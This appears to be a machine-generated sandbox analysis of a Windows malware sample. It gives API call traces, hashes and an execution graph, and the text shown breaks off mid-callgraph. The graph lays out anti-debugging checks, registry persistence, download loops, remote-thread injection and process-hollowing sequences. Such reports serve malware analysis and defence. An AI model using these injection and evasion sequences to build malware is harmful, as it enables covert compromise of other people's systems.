                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E390D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3920
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3935
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E3948
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E388C: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F73E3A71), ref: 00007FF7F73E395D
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E452C: CreateFileW.KERNEL32 ref: 00007FF7F73E4573
                                                                                                                                                                                                                                    • Part of subcall function 00007FF7F73E10D8: OpenProcess.KERNEL32 ref: 00007FF7F73E10FC
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF7F73E2FCF
                                                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF7F73E2FE2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1279498206.00007FF7F73E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7F73E0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279466592.00007FF7F73E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279538794.00007FF7F73E5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279620060.00007FF7F73E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279697296.00007FF7F73E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000003.00000002.1279740088.00007FF7F73EB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7ff7f73e0000_m5804Te9Uw.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$CreateFileHeapProcess$AttributesDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                                  • API String ID: 1115570603-2286007224
                                                                                                                                                                                                                                  • Opcode ID: 95aef461ef1f9e9f9686b8daab66f7c0abc0f7e40fb25e4f5403c42a13b66269
                                                                                                                                                                                                                                  • Instruction ID: d7912afe1be8ccfbb96edeec8aa12d1949e76b6e3052affcae59b613fd882ae2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95aef461ef1f9e9f9686b8daab66f7c0abc0f7e40fb25e4f5403c42a13b66269
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB11E628D19AC2A6E710EB10F8443E6B3A0EF88744F801539D56C526A5DF3CE05E8BA2

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:42%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                  Total number of Nodes:479
                                                                                                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                                                                                                  execution_graph 1433 7ff7df221088 GetModuleHandleA GetProcAddress 1434 7ff7df2210bb 1433->1434 1438 7ff7df222168 1439 7ff7df222192 InternetOpenW 1438->1439 1440 7ff7df2221cc InternetOpenUrlW 1439->1440 1441 7ff7df2221bf Sleep 1439->1441 1442 7ff7df222203 InternetOpenUrlW 1440->1442 1443 7ff7df222255 HttpQueryInfoA 1440->1443 1441->1439 1442->1443 1446 7ff7df22223a InternetCloseHandle Sleep 1442->1446 1444 7ff7df2222aa 1443->1444 1445 7ff7df222284 InternetCloseHandle InternetCloseHandle Sleep 1443->1445 1447 7ff7df222311 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1444->1447 1448 7ff7df2222b4 InternetCloseHandle InternetOpenUrlW 1444->1448 1445->1439 1446->1439 1450 7ff7df222390 1447->1450 1451 7ff7df222376 InternetCloseHandle InternetCloseHandle 1447->1451 1448->1447 1449 7ff7df2222f6 InternetCloseHandle Sleep 1448->1449 1449->1439 1453 7ff7df222398 InternetReadFile 1450->1453 1454 7ff7df2223e6 InternetCloseHandle InternetCloseHandle 1450->1454 1452 7ff7df22240f 1451->1452 1453->1450 1453->1454 1454->1452 832 7ff7df223414 891 7ff7df22153c 832->891 837 7ff7df22342c ExitProcess 838 7ff7df223434 1125 7ff7df2240ac GetCurrentProcess OpenProcessToken 838->1125 842 7ff7df22344f 843 7ff7df223464 842->843 844 7ff7df2234b3 842->844 1140 7ff7df2241ec CreateMutexExA 843->1140 847 7ff7df2234c8 844->847 848 7ff7df223504 844->848 851 7ff7df2241ec 3 API calls 847->851 855 7ff7df22355a 848->855 856 7ff7df223519 848->856 849 7ff7df22348a ExitProcess 850 7ff7df2241ec 3 API calls 852 7ff7df223483 850->852 853 7ff7df2234d4 851->853 852->849 854 7ff7df223492 852->854 857 7ff7df2234db ExitProcess 853->857 858 7ff7df2234e3 853->858 1144 7ff7df2232a4 854->1144 1158 7ff7df223a3c 855->1158 862 7ff7df2241ec 3 API calls 856->862 1153 7ff7df223214 858->1153 866 7ff7df223525 862->866 863 7ff7df2234e8 867 7ff7df2234fc ExitProcess 863->867 868 7ff7df2234ef Sleep 863->868 865 7ff7df223497 870 7ff7df2234ab ExitProcess 865->870 871 7ff7df22349e SleepEx 865->871 872 7ff7df22352c ExitProcess 866->872 873 7ff7df223534 866->873 868->863 871->865 875 7ff7df223214 21 API calls 873->875 878 7ff7df223539 875->878 876 7ff7df223572 879 7ff7df2241ec 3 API calls 876->879 877 7ff7df2235c6 CreateThread CreateThread CreateThread WaitForMultipleObjects ExitProcess 880 7ff7df22354d ExitProcess 878->880 881 7ff7df223540 Sleep 878->881 882 7ff7df22357e 879->882 881->878 883 7ff7df223598 ExitProcess 882->883 884 7ff7df2241ec 3 API calls 882->884 885 7ff7df223591 884->885 885->883 886 7ff7df2235a0 885->886 887 7ff7df2232a4 45 API calls 886->887 888 7ff7df2235a5 887->888 889 7ff7df2235b9 ExitProcess 888->889 890 7ff7df2235ac Sleep 888->890 890->888 1168 7ff7df22149c LoadLibraryA GetProcAddress 891->1168 893 7ff7df2215c6 1169 7ff7df22149c LoadLibraryA GetProcAddress 893->1169 895 7ff7df2215e0 1170 7ff7df2214ec LoadLibraryA GetProcAddress 895->1170 897 7ff7df2215fa 1171 7ff7df2214ec LoadLibraryA GetProcAddress 897->1171 899 7ff7df221614 1172 7ff7df2214ec LoadLibraryA GetProcAddress 899->1172 901 7ff7df22162e 1173 7ff7df2214ec LoadLibraryA GetProcAddress 901->1173 903 7ff7df221648 1174 7ff7df2214ec LoadLibraryA GetProcAddress 903->1174 905 7ff7df221662 1175 7ff7df2214ec LoadLibraryA GetProcAddress 905->1175 907 7ff7df22167c 1176 7ff7df2214ec LoadLibraryA GetProcAddress 907->1176 909 7ff7df221696 1177 7ff7df2214ec LoadLibraryA GetProcAddress 909->1177 911 7ff7df2216b0 1178 7ff7df2214ec LoadLibraryA GetProcAddress 911->1178 913 7ff7df2216ca 1179 7ff7df22149c LoadLibraryA GetProcAddress 913->1179 915 7ff7df2216e4 1180 7ff7df22149c LoadLibraryA GetProcAddress 915->1180 917 7ff7df2216fe 1181 7ff7df22149c LoadLibraryA GetProcAddress 917->1181 919 7ff7df221718 1182 7ff7df22149c LoadLibraryA GetProcAddress 919->1182 921 7ff7df221732 1183 7ff7df2214ec LoadLibraryA GetProcAddress 921->1183 923 7ff7df22174c 1184 7ff7df2214ec LoadLibraryA GetProcAddress 923->1184 925 7ff7df221766 1185 7ff7df2214ec LoadLibraryA GetProcAddress 925->1185 927 7ff7df221780 1186 7ff7df2214ec LoadLibraryA GetProcAddress 927->1186 929 7ff7df22179a 1187 7ff7df2214ec LoadLibraryA GetProcAddress 929->1187 931 7ff7df2217b4 1188 7ff7df2214ec LoadLibraryA GetProcAddress 931->1188 933 7ff7df2217ce 1189 7ff7df2214ec LoadLibraryA GetProcAddress 933->1189 935 7ff7df2217e8 1190 7ff7df2214ec LoadLibraryA GetProcAddress 935->1190 937 7ff7df221802 1191 7ff7df2214ec LoadLibraryA GetProcAddress 937->1191 939 7ff7df22181c 1192 7ff7df2214ec LoadLibraryA GetProcAddress 939->1192 941 7ff7df221836 1193 7ff7df2214ec LoadLibraryA GetProcAddress 941->1193 943 7ff7df221850 1194 7ff7df2214ec LoadLibraryA GetProcAddress 943->1194 945 7ff7df22186a 1195 7ff7df2214ec LoadLibraryA GetProcAddress 945->1195 947 7ff7df221884 1196 7ff7df2214ec LoadLibraryA GetProcAddress 947->1196 949 7ff7df22189e 1197 7ff7df2214ec LoadLibraryA GetProcAddress 949->1197 951 7ff7df2218b8 1198 7ff7df2214ec LoadLibraryA GetProcAddress 951->1198 953 7ff7df2218d2 1199 7ff7df2214ec LoadLibraryA GetProcAddress 953->1199 955 7ff7df2218ec 1200 7ff7df2214ec LoadLibraryA GetProcAddress 955->1200 957 7ff7df221906 1201 7ff7df2214ec LoadLibraryA GetProcAddress 957->1201 959 7ff7df221920 1202 7ff7df2214ec LoadLibraryA GetProcAddress 959->1202 961 7ff7df22193a 1203 7ff7df2214ec LoadLibraryA GetProcAddress 961->1203 963 7ff7df221954 1204 7ff7df2214ec LoadLibraryA GetProcAddress 963->1204 965 7ff7df22196e 1205 7ff7df2214ec LoadLibraryA GetProcAddress 965->1205 967 7ff7df221988 1206 7ff7df2214ec LoadLibraryA GetProcAddress 967->1206 969 7ff7df2219a2 1207 7ff7df2214ec LoadLibraryA GetProcAddress 969->1207 971 7ff7df2219bc 1208 7ff7df2214ec LoadLibraryA GetProcAddress 971->1208 973 7ff7df2219d6 1209 7ff7df2214ec LoadLibraryA GetProcAddress 973->1209 975 7ff7df2219f0 1210 7ff7df2214ec LoadLibraryA GetProcAddress 975->1210 977 7ff7df221a0a 1211 7ff7df2214ec LoadLibraryA GetProcAddress 977->1211 979 7ff7df221a24 1212 7ff7df2214ec LoadLibraryA GetProcAddress 979->1212 981 7ff7df221a3e 1213 7ff7df2214ec LoadLibraryA GetProcAddress 981->1213 983 7ff7df221a58 1214 7ff7df2214ec LoadLibraryA GetProcAddress 983->1214 985 7ff7df221a72 1215 7ff7df2214ec LoadLibraryA GetProcAddress 985->1215 987 7ff7df221a8c 1216 7ff7df2214ec LoadLibraryA GetProcAddress 987->1216 989 7ff7df221aa6 1217 7ff7df2214ec LoadLibraryA GetProcAddress 989->1217 991 7ff7df221ac0 1218 7ff7df2214ec LoadLibraryA GetProcAddress 991->1218 993 7ff7df221ada 1219 7ff7df2214ec LoadLibraryA GetProcAddress 993->1219 995 7ff7df221af4 1220 7ff7df2214ec LoadLibraryA GetProcAddress 995->1220 997 7ff7df221b0e 1221 7ff7df2214ec LoadLibraryA GetProcAddress 997->1221 999 7ff7df221b28 1222 7ff7df2214ec LoadLibraryA GetProcAddress 999->1222 1001 7ff7df221b42 1223 7ff7df2214ec LoadLibraryA GetProcAddress 1001->1223 1003 7ff7df221b5c 1224 7ff7df2214ec LoadLibraryA GetProcAddress 1003->1224 1005 7ff7df221b76 1225 7ff7df2214ec LoadLibraryA GetProcAddress 1005->1225 1007 7ff7df221b90 1226 7ff7df2214ec LoadLibraryA GetProcAddress 1007->1226 1009 7ff7df221baa 1227 7ff7df2214ec LoadLibraryA GetProcAddress 1009->1227 1011 7ff7df221bc4 1228 7ff7df2214ec LoadLibraryA GetProcAddress 1011->1228 1013 7ff7df221bde 1229 7ff7df2214ec LoadLibraryA GetProcAddress 1013->1229 1015 7ff7df221bf8 1230 7ff7df2214ec LoadLibraryA GetProcAddress 1015->1230 1017 7ff7df221c12 1231 7ff7df2214ec LoadLibraryA GetProcAddress 1017->1231 1019 7ff7df221c2c 1232 7ff7df2214ec LoadLibraryA GetProcAddress 1019->1232 1021 7ff7df221c46 1233 7ff7df2214ec LoadLibraryA GetProcAddress 1021->1233 1023 7ff7df221c60 1234 7ff7df2214ec LoadLibraryA GetProcAddress 1023->1234 1025 7ff7df221c7a 1235 7ff7df2214ec LoadLibraryA GetProcAddress 1025->1235 1027 7ff7df221c94 1236 7ff7df2214ec LoadLibraryA GetProcAddress 1027->1236 1029 7ff7df221cae 1237 7ff7df2214ec LoadLibraryA GetProcAddress 1029->1237 1031 7ff7df221cc8 1238 7ff7df2214ec LoadLibraryA GetProcAddress 1031->1238 1033 7ff7df221ce2 1239 7ff7df2214ec LoadLibraryA GetProcAddress 1033->1239 1035 7ff7df221cfc 1240 7ff7df2214ec LoadLibraryA GetProcAddress 1035->1240 1037 7ff7df221d16 1241 7ff7df2214ec LoadLibraryA GetProcAddress 1037->1241 1039 7ff7df221d30 1242 7ff7df2214ec LoadLibraryA GetProcAddress 1039->1242 1041 7ff7df221d4a 1243 7ff7df2214ec LoadLibraryA GetProcAddress 1041->1243 1043 7ff7df221d64 1244 7ff7df2214ec LoadLibraryA GetProcAddress 1043->1244 1045 7ff7df221d7e 1245 7ff7df2214ec LoadLibraryA GetProcAddress 1045->1245 1047 7ff7df221d98 1246 7ff7df2214ec LoadLibraryA GetProcAddress 1047->1246 1049 7ff7df221db2 1247 7ff7df2214ec LoadLibraryA GetProcAddress 1049->1247 1051 7ff7df221dcc 1248 7ff7df2214ec LoadLibraryA GetProcAddress 1051->1248 1053 7ff7df221de6 1249 7ff7df2214ec LoadLibraryA GetProcAddress 1053->1249 1055 7ff7df221e00 1250 7ff7df2214ec LoadLibraryA GetProcAddress 1055->1250 1057 7ff7df221e1a 1251 7ff7df2214ec LoadLibraryA GetProcAddress 1057->1251 1059 7ff7df221e34 1252 7ff7df2214ec LoadLibraryA GetProcAddress 1059->1252 1061 7ff7df221e4e 1253 7ff7df2214ec LoadLibraryA GetProcAddress 1061->1253 1063 7ff7df221e68 1254 7ff7df2214ec LoadLibraryA GetProcAddress 1063->1254 1065 7ff7df221e82 1255 7ff7df2214ec LoadLibraryA GetProcAddress 1065->1255 1067 7ff7df221e9c 1256 7ff7df2214ec LoadLibraryA GetProcAddress 1067->1256 1069 7ff7df221eb6 1257 7ff7df2214ec LoadLibraryA GetProcAddress 1069->1257 1071 7ff7df221ed0 1258 7ff7df2214ec LoadLibraryA GetProcAddress 1071->1258 1073 7ff7df221eea 1259 7ff7df2214ec LoadLibraryA GetProcAddress 1073->1259 1075 7ff7df221f04 1260 7ff7df2214ec LoadLibraryA GetProcAddress 1075->1260 1077 7ff7df221f1e 1261 7ff7df2214ec LoadLibraryA GetProcAddress 1077->1261 1079 7ff7df221f38 1262 7ff7df2214ec LoadLibraryA GetProcAddress 1079->1262 1081 7ff7df221f52 1263 7ff7df2214ec LoadLibraryA GetProcAddress 1081->1263 1083 7ff7df221f6c 1264 7ff7df2214ec LoadLibraryA GetProcAddress 1083->1264 1085 7ff7df221f86 1265 7ff7df2214ec LoadLibraryA GetProcAddress 1085->1265 1087 7ff7df221fa0 1266 7ff7df2214ec LoadLibraryA GetProcAddress 1087->1266 1089 7ff7df221fba 1267 7ff7df22149c LoadLibraryA GetProcAddress 1089->1267 1091 7ff7df221fd4 1268 7ff7df2214ec LoadLibraryA GetProcAddress 1091->1268 1093 7ff7df221fee 1269 7ff7df2214ec LoadLibraryA GetProcAddress 1093->1269 1095 7ff7df222008 1270 7ff7df2214ec LoadLibraryA GetProcAddress 1095->1270 1097 7ff7df222022 1271 7ff7df2214ec LoadLibraryA GetProcAddress 1097->1271 1099 7ff7df22203c 1272 7ff7df2214ec LoadLibraryA GetProcAddress 1099->1272 1101 7ff7df222056 1273 7ff7df2214ec LoadLibraryA GetProcAddress 1101->1273 1103 7ff7df222070 1274 7ff7df2214ec LoadLibraryA GetProcAddress 1103->1274 1105 7ff7df22208a 1275 7ff7df22149c LoadLibraryA GetProcAddress 1105->1275 1107 7ff7df2220a4 1276 7ff7df22149c LoadLibraryA GetProcAddress 1107->1276 1109 7ff7df2220be 1277 7ff7df2214ec LoadLibraryA GetProcAddress 1109->1277 1111 7ff7df2220d8 1278 7ff7df2214ec LoadLibraryA GetProcAddress 1111->1278 1113 7ff7df2220f2 1279 7ff7df2214ec LoadLibraryA GetProcAddress 1113->1279 1115 7ff7df22210c 1280 7ff7df2214ec LoadLibraryA GetProcAddress 1115->1280 1117 7ff7df222126 1281 7ff7df2214ec LoadLibraryA GetProcAddress 1117->1281 1119 7ff7df222140 1282 7ff7df2214ec LoadLibraryA GetProcAddress 1119->1282 1121 7ff7df22215a 1122 7ff7df2231b4 IsDebuggerPresent 1121->1122 1123 7ff7df2231c6 GetCurrentProcess CheckRemoteDebuggerPresent 1122->1123 1124 7ff7df2231c2 1122->1124 1123->1124 1124->837 1124->838 1126 7ff7df223439 1125->1126 1127 7ff7df2240d2 GetTokenInformation 1125->1127 1136 7ff7df223cac GetModuleFileNameW 1126->1136 1283 7ff7df223b1c VirtualAlloc 1127->1283 1129 7ff7df224103 GetTokenInformation 1130 7ff7df224130 CloseHandle 1129->1130 1134 7ff7df22414a AdjustTokenPrivileges CloseHandle 1129->1134 1131 7ff7df223aec VirtualFree 1130->1131 1132 7ff7df224145 1131->1132 1132->1126 1284 7ff7df223aec 1134->1284 1137 7ff7df223cd7 PathFindFileNameW wcslen 1136->1137 1138 7ff7df223d9a wcsncpy 1136->1138 1139 7ff7df223d11 1137->1139 1138->1139 1139->842 1141 7ff7df224218 GetLastError 1140->1141 1142 7ff7df223470 1140->1142 1141->1142 1143 7ff7df224225 CloseHandle 1141->1143 1142->849 1142->850 1143->1142 1287 7ff7df22388c 1144->1287 1146 7ff7df2232b5 1290 7ff7df22452c CreateFileW 1146->1290 1148 7ff7df22330f CreateThread 1148->865 1149 7ff7df2232cd 1149->1148 1302 7ff7df22408c 1149->1302 1154 7ff7df22388c 11 API calls 1153->1154 1155 7ff7df223224 1154->1155 1338 7ff7df2242fc CreateFileW 1155->1338 1159 7ff7df22370c 3 API calls 1158->1159 1160 7ff7df223a67 1159->1160 1161 7ff7df22388c 11 API calls 1160->1161 1162 7ff7df223a71 GetModuleFileNameW DeleteFileW CopyFileW 1161->1162 1163 7ff7df22355f 1162->1163 1164 7ff7df223ab3 SetFileAttributesW 1162->1164 1166 7ff7df2233a4 GetVersionExW 1163->1166 1350 7ff7df22397c RegOpenKeyExW 1164->1350 1167 7ff7df2233d5 1166->1167 1167->876 1167->877 1168->893 1169->895 1170->897 1171->899 1172->901 1173->903 1174->905 1175->907 1176->909 1177->911 1178->913 1179->915 1180->917 1181->919 1182->921 1183->923 1184->925 1185->927 1186->929 1187->931 1188->933 1189->935 1190->937 1191->939 1192->941 1193->943 1194->945 1195->947 1196->949 1197->951 1198->953 1199->955 1200->957 1201->959 1202->961 1203->963 1204->965 1205->967 1206->969 1207->971 1208->973 1209->975 1210->977 1211->979 1212->981 1213->983 1214->985 1215->987 1216->989 1217->991 1218->993 1219->995 1220->997 1221->999 1222->1001 1223->1003 1224->1005 1225->1007 1226->1009 1227->1011 1228->1013 1229->1015 1230->1017 1231->1019 1232->1021 1233->1023 1234->1025 1235->1027 1236->1029 1237->1031 1238->1033 1239->1035 1240->1037 1241->1039 1242->1041 1243->1043 1244->1045 1245->1047 1246->1049 1247->1051 1248->1053 1249->1055 1250->1057 1251->1059 1252->1061 1253->1063 1254->1065 1255->1067 1256->1069 1257->1071 1258->1073 1259->1075 1260->1077 1261->1079 1262->1081 1263->1083 1264->1085 1265->1087 1266->1089 1267->1091 1268->1093 1269->1095 1270->1097 1271->1099 1272->1101 1273->1103 1274->1105 1275->1107 1276->1109 1277->1111 1278->1113 1279->1115 1280->1117 1281->1119 1282->1121 1283->1129 1285 7ff7df223afd VirtualFree 1284->1285 1286 7ff7df223b10 1284->1286 1285->1286 1286->1126 1322 7ff7df22370c GetWindowsDirectoryW 1287->1322 1289 7ff7df2238bb 8 API calls 1289->1146 1291 7ff7df22458d GetFileSize GetProcessHeap RtlAllocateHeap 1290->1291 1292 7ff7df224586 1290->1292 1293 7ff7df2245e8 ReadFile 1291->1293 1294 7ff7df2245d6 CloseHandle 1291->1294 1292->1149 1295 7ff7df224637 1293->1295 1296 7ff7df22460f GetProcessHeap HeapFree CloseHandle 1293->1296 1294->1292 1297 7ff7df224650 GetProcessHeap HeapFree CloseHandle 1295->1297 1299 7ff7df224678 1295->1299 1296->1292 1297->1292 1298 7ff7df2247e3 GetProcessHeap RtlFreeHeap CloseHandle 1298->1292 1299->1298 1300 7ff7df224733 GetProcessHeap RtlAllocateHeap 1299->1300 1301 7ff7df22477c 1300->1301 1301->1298 1327 7ff7df223fcc CreateToolhelp32Snapshot 1302->1327 1305 7ff7df2210d8 OpenProcess 1306 7ff7df22111f 1305->1306 1307 7ff7df221115 1305->1307 1334 7ff7df2213c4 GetModuleHandleA GetProcAddress 1306->1334 1307->1148 1309 7ff7df22112c 1309->1307 1310 7ff7df2211fe VirtualAllocEx 1309->1310 1310->1307 1311 7ff7df22124f WriteProcessMemory 1310->1311 1311->1307 1312 7ff7df221286 WriteProcessMemory 1311->1312 1312->1307 1313 7ff7df2212d1 1312->1313 1336 7ff7df221444 GetSystemInfo 1313->1336 1316 7ff7df2212fe GetModuleHandleA GetProcAddress 1316->1307 1318 7ff7df221338 RtlCreateUserThread 1316->1318 1317 7ff7df221444 GetSystemInfo 1319 7ff7df2212f4 1317->1319 1318->1307 1320 7ff7df221399 CloseHandle 1318->1320 1319->1316 1319->1320 1321 7ff7df2213b2 1320->1321 1321->1307 1323 7ff7df223760 GetVolumeInformationW 1322->1323 1324 7ff7df223756 1322->1324 1325 7ff7df2237dc 1323->1325 1324->1323 1326 7ff7df223846 wsprintfW 1325->1326 1326->1289 1328 7ff7df224007 Process32FirstW 1327->1328 1329 7ff7df2232fa 1327->1329 1330 7ff7df224061 CloseHandle 1328->1330 1331 7ff7df224026 wcscmp 1328->1331 1329->1305 1330->1329 1332 7ff7df22404a Process32NextW 1331->1332 1333 7ff7df22403d 1331->1333 1332->1330 1332->1331 1333->1330 1335 7ff7df2213ff 1334->1335 1335->1309 1337 7ff7df2212ea 1336->1337 1337->1316 1337->1317 1339 7ff7df224352 1338->1339 1340 7ff7df224373 GetLastError 1338->1340 1344 7ff7df22424c GetFileSize 1339->1344 1342 7ff7df223237 CreateThread Sleep CreateThread 1340->1342 1342->863 1349 7ff7df223b1c VirtualAlloc 1344->1349 1346 7ff7df224278 1347 7ff7df2242c2 CloseHandle 1346->1347 1348 7ff7df22428c SetFilePointer ReadFile 1346->1348 1347->1342 1348->1347 1349->1346 1351 7ff7df2239bd 1350->1351 1352 7ff7df2239c1 RegSetValueExW RegCloseKey 1350->1352 1351->1163 1352->1351 1353 7ff7df223184 1354 7ff7df22318d 1353->1354 1355 7ff7df2231a6 1354->1355 1358 7ff7df223004 1354->1358 1363 7ff7df222e04 CreateMutexExA 1358->1363 1361 7ff7df22301f Sleep CreateThread WaitForSingleObject 1362 7ff7df223064 SleepEx 1361->1362 1362->1354 1364 7ff7df222e4d GetLastError 1363->1364 1365 7ff7df222e30 ReleaseMutex CloseHandle 1363->1365 1367 7ff7df222e77 ReleaseMutex CloseHandle 1364->1367 1368 7ff7df222e5a ReleaseMutex CloseHandle 1364->1368 1366 7ff7df222e8f 1365->1366 1366->1361 1366->1362 1367->1366 1368->1366 1369 7ff7df223344 1372 7ff7df2224d4 GetModuleFileNameW 1369->1372 1373 7ff7df222555 1372->1373 1383 7ff7df222550 1372->1383 1374 7ff7df2225a9 1373->1374 1375 7ff7df222593 1373->1375 1415 7ff7df222414 ExpandEnvironmentStringsW 1374->1415 1376 7ff7df2225c7 1375->1376 1379 7ff7df22259d 1375->1379 1416 7ff7df222454 ExpandEnvironmentStringsW 1376->1416 1379->1383 1417 7ff7df222494 ExpandEnvironmentStringsW 1379->1417 1380 7ff7df2225be 1382 7ff7df222619 CreateProcessW 1380->1382 1380->1383 1382->1383 1384 7ff7df222674 CreateFileW 1382->1384 1384->1383 1385 7ff7df2226bb GetFileSize 1384->1385 1386 7ff7df2226d9 1385->1386 1387 7ff7df2226e3 CloseHandle 1385->1387 1386->1387 1388 7ff7df2226f3 VirtualAlloc 1386->1388 1387->1383 1389 7ff7df22272d ReadFile 1388->1389 1390 7ff7df22271d CloseHandle 1388->1390 1391 7ff7df22275a VirtualFree CloseHandle 1389->1391 1392 7ff7df22277d CloseHandle GetThreadContext 1389->1392 1390->1383 1391->1383 1393 7ff7df2227cd VirtualFree 1392->1393 1394 7ff7df2227e5 ReadProcessMemory GetModuleHandleA GetProcAddress 1392->1394 1393->1383 1395 7ff7df222868 1394->1395 1396 7ff7df22286c VirtualFree 1395->1396 1397 7ff7df222884 VirtualAllocEx 1395->1397 1396->1383 1398 7ff7df222907 WriteProcessMemory 1397->1398 1399 7ff7df2228ef VirtualFree 1397->1399 1400 7ff7df22293d VirtualFree 1398->1400 1402 7ff7df222955 1398->1402 1399->1383 1400->1383 1401 7ff7df22298b WriteProcessMemory 1401->1402 1403 7ff7df222a16 VirtualFree 1401->1403 1402->1401 1408 7ff7df222a33 1402->1408 1403->1383 1404 7ff7df222d24 WriteProcessMemory SetThreadContext 1406 7ff7df222daa VirtualFree 1404->1406 1407 7ff7df222dbf ResumeThread 1404->1407 1405 7ff7df222aa5 RtlCompareMemory 1405->1408 1412 7ff7df222af8 1405->1412 1406->1383 1409 7ff7df222dd1 VirtualFree 1407->1409 1410 7ff7df222de6 VirtualFree 1407->1410 1408->1404 1408->1405 1409->1383 1410->1383 1411 7ff7df222d1f 1411->1404 1412->1411 1413 7ff7df222c28 ReadProcessMemory WriteProcessMemory 1412->1413 1413->1412 1414 7ff7df222cfd VirtualFree 1413->1414 1414->1383 1415->1380 1416->1380 1417->1380 1418 7ff7df222f34 1419 7ff7df22388c 11 API calls 1418->1419 1420 7ff7df222f73 1419->1420 1421 7ff7df22452c 17 API calls 1420->1421 1422 7ff7df222f97 1421->1422 1423 7ff7df22408c 5 API calls 1422->1423 1424 7ff7df222fba 1423->1424 1425 7ff7df2210d8 11 API calls 1424->1425 1426 7ff7df222fcf GetProcessHeap HeapFree 1425->1426 1427 7ff7df222ea4 CreateMutexA 1428 7ff7df222ec9 ReleaseMutex CloseHandle 1427->1428 1429 7ff7df222ee6 GetLastError 1427->1429 1430 7ff7df222f28 1428->1430 1431 7ff7df222f10 ReleaseMutex CloseHandle 1429->1431 1432 7ff7df222ef3 ReleaseMutex CloseHandle 1429->1432 1431->1430 1432->1430 1455 7ff7df223074 1461 7ff7df22307d 1455->1461 1456 7ff7df223169 1459 7ff7df223bec RegDeleteKeyW 1459->1461 1460 7ff7df223dec 9 API calls 1460->1461 1461->1456 1461->1459 1461->1460 1462 7ff7df22397c 3 API calls 1461->1462 1464 7ff7df22440c CreateFileW 1461->1464 1469 7ff7df223b4c RegOpenKeyExW 1461->1469 1463 7ff7df223159 Sleep 1462->1463 1463->1461 1465 7ff7df224467 1464->1465 1466 7ff7df2244a2 1464->1466 1472 7ff7df22438c SetFilePointer WriteFile SetEndOfFile 1465->1472 1466->1461 1468 7ff7df224483 SetFileAttributesW CloseHandle 1468->1466 1470 7ff7df223bda 1469->1470 1471 7ff7df223ba0 RegSetValueExW RegCloseKey 1469->1471 1470->1461 1471->1470 1472->1468 1473 7ff7df223364 1474 7ff7df2224d4 36 API calls 1473->1474 1475 7ff7df223377 1474->1475

                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                  callgraph 0 Function_00007FF7DF22F749 1 Function_00007FF7DF22F747 2 Function_00007FF7DF22B248 3 Function_00007FF7DF22424C 20 Function_00007FF7DF223B1C 3->20 4 Function_00007FF7DF223B4C 5 Function_00007FF7DF22B04E 6 Function_00007FF7DF22F74B 7 Function_00007FF7DF22B052 8 Function_00007FF7DF22B152 9 Function_00007FF7DF22C14F 10 Function_00007FF7DF222454 11 Function_00007FF7DF223555 12 Function_00007FF7DF22DC37 13 Function_00007FF7DF22153C 67 Function_00007FF7DF22149C 13->67 95 Function_00007FF7DF2214EC 13->95 14 Function_00007FF7DF223A3C 24 Function_00007FF7DF22388C 14->24 31 Function_00007FF7DF22397C 14->31 77 Function_00007FF7DF22370C 14->77 15 Function_00007FF7DF221444 16 Function_00007FF7DF223344 51 Function_00007FF7DF2224D4 16->51 17 Function_00007FF7DF22452C 53 Function_00007FF7DF2244BC 17->53 18 Function_00007FF7DF223C2C 19 Function_00007FF7DF222F34 19->17 19->18 19->24 25 Function_00007FF7DF22408C 19->25 101 Function_00007FF7DF2210D8 19->101 21 Function_00007FF7DF22EC20 22 Function_00007FF7DF221088 23 Function_00007FF7DF22E289 24->77 49 Function_00007FF7DF223FCC 25->49 26 Function_00007FF7DF22438C 27 Function_00007FF7DF222494 28 Function_00007FF7DF22DA94 29 Function_00007FF7DF22E079 30 Function_00007FF7DF22B778 32 Function_00007FF7DF22147F 33 Function_00007FF7DF22E07F 